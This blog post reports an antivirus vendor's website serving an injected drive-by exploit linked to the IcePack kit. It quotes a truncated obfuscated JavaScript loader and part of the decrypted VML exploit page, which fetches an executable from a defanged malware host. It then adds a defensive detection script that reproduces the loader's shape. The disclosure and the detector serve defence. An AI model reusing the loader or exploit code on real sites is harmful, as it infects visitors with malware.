Antivirus company website is infected!!!

UPDATE (08/02): The malicious IFRAME has been removed. So web admins should know the various methods of attack, keep their sites and servers updated, and audit them.

What do you think when an antivirus company’s website is itself infecting its users? That is the most alarming situation in web security, and it shows the problem of surfing supposed-to-be-trusted websites.
The same happened to the antivirus website of Delhi (India) based AVsoft Technologies, http://www.s-cop.com.
Their product “SmartCop Antivirus” is capable of detecting malware!

The infection is carried out by exploiting common vulnerabilities using an encrypted script. In this case it looks like this:

<script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,37,11,46,55,34,16,14,60,58,0,0,0,0,0,0,18,24,29,45,6,38,48,41,61,50,33,17);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}dc("gPjEXVXIadA4ie8IN0zSARiSdT8eNqcLfhpMNhiIpq8vnqCIoVX5DypIW……….

which decrypts to

<html xmlns:v="urn:schemas-microsoft-com:vml"><head>
<object id="VMLRender" classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E">
</object>
<style>
v\:* { behavior: url(#VMLRender); }
</style>
</head>
<body><div id="myDivA"></div>
<script language="JavaScript">
 function bxdbSGIA(Z0gP3oql, Bwpp5g4P)
 {
  while (Z0gP3oql.length*2<Bwpp5g4P)  ….

function Attack(n)
 {…
'<param name="src" value=" http://ntkrnlpa[dot]info/rc/exe[dot]
………
Just see the screenshots below…

4.jpg

3.jpg

2.jpg

All of this is used by the infamous (underground networks!!) tool “IcePack”. You can see its admin console below.

1.jpg

Already reported to concerned authorities.
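
For the site audit recommended in the update at the top, here is an added example (not from the original post or from any vendor's tooling): a static check that flags inline script blocks carrying the traits of the self-decoding loader quoted above. The trait weights, the threshold of 5 and the function names are assumptions, and the sample pages are constructed.

```javascript
// Added example: static audit of served HTML for self-decoding injected scripts.
// Traits mirror the loader quoted in the post; weights and threshold are assumptions.
const TRAITS = [
  { name: 'document.write', re: /document\.write\s*\(/, weight: 1 },
  { name: 'String.fromCharCode', re: /String\.fromCharCode\s*\(/, weight: 1 },
  { name: 'charCodeAt', re: /\.charCodeAt\s*\(/, weight: 1 },
  { name: 'bitwise decode', re: /\^|>>=|<</, weight: 1 },
  { name: 'long encoded literal', re: /["'][A-Za-z0-9+\/=]{40,}/, weight: 2 },
  { name: 'numeric lookup table', re: /Array\s*\((\s*\d+\s*,){15,}/, weight: 2 },
];

// Return the body of every inline <script> block in the page.
function extractScripts(html) {
  const bodies = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script\s*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) bodies.push(m[1]);
  return bodies;
}

// Score each script block; report those at or above the threshold.
function auditHtml(html, threshold = 5) {
  const findings = [];
  extractScripts(html).forEach((body, index) => {
    const hits = TRAITS.filter((t) => t.re.test(body));
    const score = hits.reduce((sum, t) => sum + t.weight, 0);
    if (score >= threshold) {
      findings.push({ index, score, traits: hits.map((t) => t.name) });
    }
  });
  return findings;
}

// Constructed sample pages (not captured from the affected site). The loader has
// the shape quoted in the post; FILLER stands in for the encoded payload.
const FILLER = 'Q'.repeat(64);
const INFECTED = `<html><body><h1>Products</h1>
<script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,37,11,46,55,34,16,14,60,58,0,0,0,0,0,0,18,24,29,45,6,38,48,41,61,50,33,17);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}dc("${FILLER}")</script>
</body></html>`;
const CLEAN = '<html><body><script>document.write(new Date().getFullYear());</script></body></html>';

// Print the findings for both samples when run directly.
console.log(JSON.stringify(auditHtml(INFECTED), null, 2));
console.log(JSON.stringify(auditHtml(CLEAN)));
```

A hit is a lead for manual review rather than a verdict: ordinary scripts can show one or two of these traits, which is why no single trait reaches the threshold.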


8 Responses to “Antivirus company website is infected!!!”

  1. Antivirus company infects its own customers (ENG)

    An Indian company that sells the SmartCop Antivirus cripples it so that it does not detect malware and makes use of a vulnerability to use an encrypted script to slip its customers the IcePack software, which is a tool for installing malwa…

  2. There are lots of other tools that do the same things, such as MPack, FirePack, WebAttackers.. The need is to have up-to-date software and to secure the program code so that no RFI or code injection

  3. […] Sarah wrote an interesting post today onHere’s a quick excerptWhat do you think if an antivirus company’s website itself infecting the users? Well that’s the most alarming situation about web-security and problem of surfing suppose-to-be trusted website. The same happened to Delhi (India) based … […]

  4. […] What do you think if an antivirus company’s website itself infecting the users? Well that’s the most alarming situation about web-security and problem of surfing suppose-to-be trusted website.
    The same happened to Delhi (India) based AVsoft Technologies’s antivirus […]

  5. I must say, I could not agree with you in 100%, but it's just my opinion, which indeed could be wrong.
    p.s. You have a very good template. Where did you find it?

  6. That’s an interesting article. I just wondered if you could tell me where to find more info on this topic?

  7. Really nice post. Very Informative and helpful post.

  8. Thank you. Awesome submissions you have here. Got some extra sites to direct to which have a bit more info?
